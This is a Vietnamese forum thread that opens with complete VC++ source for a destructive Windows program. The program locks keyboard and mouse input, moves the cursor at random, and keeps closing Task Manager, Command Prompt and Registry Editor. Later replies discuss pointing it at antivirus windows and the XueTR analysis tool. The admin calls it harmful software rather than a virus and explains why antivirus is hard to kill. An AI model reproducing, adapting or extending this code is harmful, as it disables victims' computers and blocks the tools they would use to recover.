Code virus viết trên VC++ hoạt động như thế nào?

[chimlonvn]

Code

Mã:

#include <windows.h>#include <winable.h> HWND mywindow, TaskMgr, CMD,Regedit; //hwnd la` DWORD WINAPI DestroyWindows(LPVOID); int main(){ int x,y; CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL); while(1)    {         BlockInput( true );         Sleep(6);         x = rand()%801;         y = rand()%601;         SetCursorPos(x,y);    }   return 0;}  DWORD WINAPI DestroyWindows(LPVOID) {  while(1)     {          TaskMgr = FindWindow(NULL,"Windows Task Manager");          CMD = FindWindow(NULL, "Command Prompt");          Regedit = FindWindow(NULL,"Registry Editor");          if( TaskMgr != NULL )              {                      PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);              }          if( CMD != NULL )              {                       PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);              }          if( Regedit != NULL )               {                       PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);               }           Sleep(10);     }}

Con này có chạy ẩn để tắt taskman,regedit,cmd không?
Nếu muốn đổi tắt regedit sang một cái khác ví dụ như mấy cái thông báo bản quyền của av thì nó có tắt luôn cái av không?
Nguồn ddth

View more random threads:

• Ngôn ngữ lập trình để viết virus
• học phần mềm có làm được trình duyệt viruts không?
• Project phân tích Malware
• Nguyên nhân tôi viết virus, đam mê và làm chủ
• Các kĩ thuật ẩn lời gọi hàm API trên Win32 [Tài liệu tổng hợp]
• Tài liệu và mã nguồn spyware có thể kiếm ở đâu ?
• Characters Allowed in file name (ANSI)
• Thực thi luôn file .exe mà không cần Click chuột
• Debug xem task manager tắt file bằng hàm api nào
• Bắt đầu lập trình Virus và AntiVirus, kiến thức cơ bản cần gì?

[canhodiamondvn]

_ Khóa chuột, phím.
_ set vị trí chuột random.
_ không cho bật : Windows Task Manager, CMD, Registry.

+ nếu bạn đọc hiểu code này bạn sẽ viết được thứ mà bạn muốn hỏi. nhưng tắt cái av thì khoai đấy [IMG]images/smilies/17.gif[/IMG]


Đây chưa gọi là virus được .

[NguyenThi]

à,hiểu rồi,nếu thay mấy cái như Registry Editor thành một cái gì đó khác thì nó cũng như vậy phải không?

[dudung94]

à,hiểu rồi,nếu thay mấy cái như Registry Editor thành một cái gì đó khác thì nó cũng như vậy phải không?

bạn thử tắt cái XueTR giống như thế kia đi, nếu được thì mình cam đoạn bạn viết được virus

[nhungdo]

Được tắt được XueTR!!!

[gohusu]

Code trên liệu có ngốn tài nguyên quá ko nhỉ? [IMG]images/smilies/thinking.gif[/IMG]

[linhphukientaythuc]

Code trên liệu có ngốn tài nguyên quá ko nhỉ? [IMG]images/smilies/thinking.gif[/IMG]

Ngốn sao anh em thấy nó nhỏ lắm mà,máy vẫn chạy nhanh như thường

[admin]

Đây không phải virus, nó đơn giản là một phần mềm phá hoại, ko có khả năng chạy tự động và nhân bản.
Muốn tắt được AV thì bạn không có khả năng, muốn làm thế bạn phải can thiệp vào SERVICE, riêng cái quyền can thiệp này đã được chống bởi AV. Các virus hiện tại thường can thiệp không cho phân giải được tên miền của các trang antivirus, hay nếu phát hiện cửa sổ Install của Anti thì kill chứ ko cái nào tắt đc AV cả :P

[ngovannamcntt]

Được tắt được XueTR!!!

^[IMG]images/smilies/smile.png[/IMG]^ dùng FindWindow mà tìm được handle của XueTR á. bái phục[IMG]images/smilies/17.gif[/IMG][IMG]images/smilies/17.gif[/IMG]

>> XueTR nó tạo 1 string ngẫu nhiên để đăng kí windows class và windows name bạn ạ. Bạn chưa thử thì đừng nói bừa. Ko chơi cách dùng Process name vì cách đó vượt qua quá dễ

[seo3m]

^[IMG]images/smilies/smile.png[/IMG]^ dùng FindWindow mà tìm được handle của XueTR á. bái phục[IMG]images/smilies/17.gif[/IMG][IMG]images/smilies/17.gif[/IMG]

>> XueTR nó tạo 1 string ngẫu nhiên để đăng kí windows class và windows name bạn ạ. Bạn chưa thử thì đừng nói bừa. Ko chơi cách dùng Process name vì cách đó vượt qua quá dễ

bổ sung tý là nên thử trò Send/Post Message với cửa sổ của Kaspersky, vui lắm [IMG]images/smilies/tongue.png[/IMG]